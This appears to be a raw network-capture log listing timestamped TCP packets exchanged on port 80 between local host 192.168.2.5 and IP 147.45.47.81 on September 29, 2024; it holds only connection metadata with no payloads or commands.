                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.846586943 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.846591949 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.846630096 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.846669912 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.846678019 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.846738100 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.846780062 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.846786976 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.846821070 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.846852064 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.846857071 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.846885920 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.846921921 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.846951008 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.846985102 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847022057 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847033024 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847065926 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847094059 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847105980 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847126961 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847160101 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847170115 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847188950 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847232103 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847237110 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847270012 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847301960 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847310066 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847337961 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847369909 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847385883 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847435951 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847467899 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847489119 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847500086 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847532988 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847542048 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847580910 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847614050 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847623110 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847645998 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847677946 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847693920 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847716093 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847754002 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847768068 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847800016 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847847939 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847847939 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847881079 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847914934 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847923994 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847949028 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847990036 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.847997904 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848032951 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848063946 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848077059 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848097086 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848129034 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848140001 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848161936 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848191977 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848206997 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848223925 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848254919 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848264933 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848288059 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848320007 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848341942 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848352909 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848397970 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848402977 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848440886 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848468065 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848485947 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848499060 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848531008 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848540068 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848562956 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848593950 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848609924 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848684072 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848717928 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848732948 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848751068 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848784924 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848798037 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848818064 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848850012 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848861933 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848881960 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848916054 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848926067 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848948956 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848979950 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.848990917 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849010944 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849045038 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849052906 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849076986 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849112034 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849123955 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849144936 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849178076 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849184990 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849210978 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849241972 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849256039 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849276066 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849309921 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849320889 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849340916 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849389076 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849402905 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849422932 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849457026 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849462986 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849488020 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849522114 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849534035 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849554062 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849587917 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849601984 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849618912 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849652052 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849666119 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849685907 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849716902 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849729061 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849754095 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849786997 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849797010 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849818945 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849853039 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849864006 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849886894 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849930048 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.849932909 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.895215988 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.920085907 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.920135975 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.920169115 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.920191050 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.920201063 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.920234919 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.920248985 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.920265913 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.920300961 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.920314074 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.932753086 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.932804108 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.932810068 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.932837963 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.932871103 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.932887077 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.932904005 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.932950020 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.932950974 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.932986021 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933017969 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933027029 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933052063 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933098078 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933100939 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933132887 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933166027 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933182955 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933198929 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933232069 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933245897 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933264971 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933303118 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933314085 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933336020 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933368921 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933382988 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933418989 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933463097 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933468103 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933506012 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933553934 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933554888 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933619022 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933646917 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933662891 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933697939 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933747053 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933748007 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933796883 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933830023 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933846951 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933867931 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933913946 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933917999 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933947086 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933979034 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.933994055 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934010983 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934055090 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934057951 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934091091 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934123993 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934135914 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934174061 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934206009 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934221983 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934238911 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934269905 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934278965 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934319019 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934350967 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934366941 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934401035 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934432030 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934448957 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934465885 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934498072 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934511900 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934530973 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934562922 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934592962 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934595108 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934627056 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934648037 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934684038 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934720039 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934734106 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934752941 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934783936 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934799910 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934835911 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934864998 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934884071 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934895992 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934928894 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934942961 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934962034 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934993029 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.934999943 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.935024977 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.935058117 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.935071945 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.935108900 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.935142040 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.935156107 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.935175896 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.935209036 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.935221910 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.935241938 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.935273886 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.935285091 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.935302019 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.935333014 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.935347080 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.935365915 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.935406923 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.935415030 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.935447931 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.935478926 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.935492992 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.935512066 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.935544014 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.935564995 CEST4970680192.168.2.5147.45.47.81
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.935576916 CEST8049706147.45.47.81192.168.2.5
                                                                                                                                                                                                                                        Sep 29, 2024 09:44:14.935614109 CEST8049706147.45.47.81192.168.2.5
